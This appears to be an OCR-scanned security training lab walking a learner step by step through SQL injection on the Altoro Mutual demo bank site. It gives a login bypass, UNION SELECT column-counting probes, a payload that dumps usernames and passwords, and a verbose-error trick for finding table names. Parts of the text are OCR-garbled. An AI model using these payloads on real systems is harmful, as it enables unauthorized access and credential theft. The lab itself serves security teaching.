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Lab 4 Steal USernames and Passwords 


You saw how SQL injection can cause an application to use invalidated user input to either circumvent 
the application's business logic or interact with the database directly. 


In this lab we are going to learn how to use the UNION key word which is used to combine the results 
from two queries. Using UNION we will be able to query the database with our own requests, 
independent of the original query. 


At the end of the Lab we will have exploited the SQL injection vulnerability to retrieve all the usernames 
and passwords in the database. 


In this lab you will play the role of a malicious user. 


Lab Overview 
4.1: Find a page that lists information 
e What page lists information? 
e Does the page accept user input in any way? 
e Think about how this information is pulled from the database. 
4.2 Find the vulnerability 
e How do! manipulate the input to find a vulnerability? 
e What steps should | try to “break the system” 
4.3 Exploit 
e What steps are required to make this happen? 
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4.1. Finda page that lists information 


__1. Open a Firefox browser by selecting the icon on the desktop 


a 
Mozilla Firefox 








__2. Enter site http://demo.testfire.net/bank/main.aspx 


e NOTE: It is assumed you are logged in from the last lab, if not 
you can login with username=admin’ - - and 


password=<anything, it doesn’t matter as long as it is not null> 
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__3. Enter in username field admin’-- and any password and select Login button 





Online Banking Login 


Username: [admin'-- 
Password: le 








__4. Select link View Recent Transactions 





AltoroMutu 


m MY ACCOUNT 


I WANTTO... 
@ View Accoun romar 
@ View Recent Transactions 
@ Transfer Funds 
@ Search News Articles 
@ Customize Site Language 


ADMINISTRATION 


@ View Application Values 
* Edit Users 








__5. In After edit box, enter 12/12/2010 in the Starting Date and select Submit button 


Recent Transactions 





@ 
Admin user has no account activity 
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__6. Select Back button 
@- 


4.2 Find the vulnerability 





__1. Enter a single ‘ in the date field and select Submit button 


After If | Before 





__2. Review result 


TranzactioniI> Accountid Dereription 


1 


2 We learn the site is vulnerable to SOL injection since the Column 
names are shown 


__ 3. Select Back button 





__4. Enter in After field 1/1/2010 union select 1 from users--and select Submit button 





mn select 1 from users-- Before 
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5. Review Result 


[ B Mi cornvare 


An Error Has Occurred 


Summary: 


All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists. 


Error Message: 
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System.Date.OleDb.OleDbException: All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target 
lists. at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr) at System.Data.OleDb.OleDbDataReader.NextResult{) at 
System.Data.OleDb.OleDbCommand.ExecuteR eaderInternal{ CommandBehavior behavior, String method) at System.Data.OleDb.OleDbCommand.ExecuteReader 
(CommeandBehavior behavior) at System.Data.OleDb.OleDbCommand.System.Data.IDbCommand.ExecuteReader{ CommandBehavior behavior) at 
System.Date.Common.DbDateAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand 
command, CommandBehavior behavior) at System.Data.Common.DbDateAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable, 
IDbCommend command, CommandBehavior behavior) at System.Data.Common.DbDateAdapter.Fill(DataSet dataSet, String srcTable) at 
Altoro.RecentTransactions.BindGrid() in c:\AltoroMutual\website\bank\transaction.aspx.cs:line 70 at Altoro.RecentTransactions.Page Load(Object sender, EventArgs 
€) in c:\AltoroMutual\website\bank\transaction.aspx.cs:line 32 at System.Web.Util.CalliHelper.EventArgFunctionCaller({IntPtr fp, Object o, Object t, EventArgs e) at 
System. Web.Util. CalliEventhHandlerDelegateProxy.Callback(Object sender, EventArgs €) at System.Web.UI.Control.OnLoad(EventArgs €) at 
System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean 


includeStagesAfterAsyncPoint) 





Unions are used to combine the results from 2 queries. The 
second query AFTER the union is completely in our control. 


In order to use the union, both queries must use the same number 
of columns in the select. We first need to find out how many 
columns we have should in the second query. 


When we input the above statement we see that we get an error 
which lets us know that we do no have enough columns in our 


4 select statement. 


The malicious user will then add an additional column to the 
query with each request until they no longer see this error. 


1.€. 

field 1/1/2010 union select 1,1 from users— 
field 1/1/2010 union select 1,1 from users— 
field 1/1/2010 union select 1,1,1 from users-- 
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6. Select the back button 
@- 


__7. Enter in After field 1/1/2010 union select 1,1,1,1 from users-- and select Submit button 





__ 8. Review Result 


1/1/2010 union select; before | Submit | 


Transzacto nit Accountid Description 


Z 1 





Injection succeeds 


We learn that we have the right number of columns and the SOL 
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__9. Select Back button 


q- 





4.3 Exploit 


1. Enter in After field 1/1/2010 union select userid,null,usernamet' 'tpassword,null from users-- 
and select Submit button (Note: there is a space between "") 


__10. Review Results 


1/1/2010 union select 1 Before Submit | 


Trans actionID Accountld Description 
16011é014 jsmith Demol234 
16021€018 sspeed Deamollz4 
LO0SLéEO01L2 tuser tusder 


100426016 admin admin 


100516010 ijoe fracian 


L00616014 cclay Ali 





i 


We learn all the userids and passwords in the database! 


Note: How did we know to use users for the table name and 
username and password were columns in the table?? The 
© malicious user could have used trial and error to find this 

information out, or if you enter ' having 1=I- - as the username 
and anything for the password on the login page 
(http://demo.testfire.net/bank/ogin.aspx) you will see a VERY 
verbose error message that would allow us to get this 
information directly. 


11. Close Firefox 
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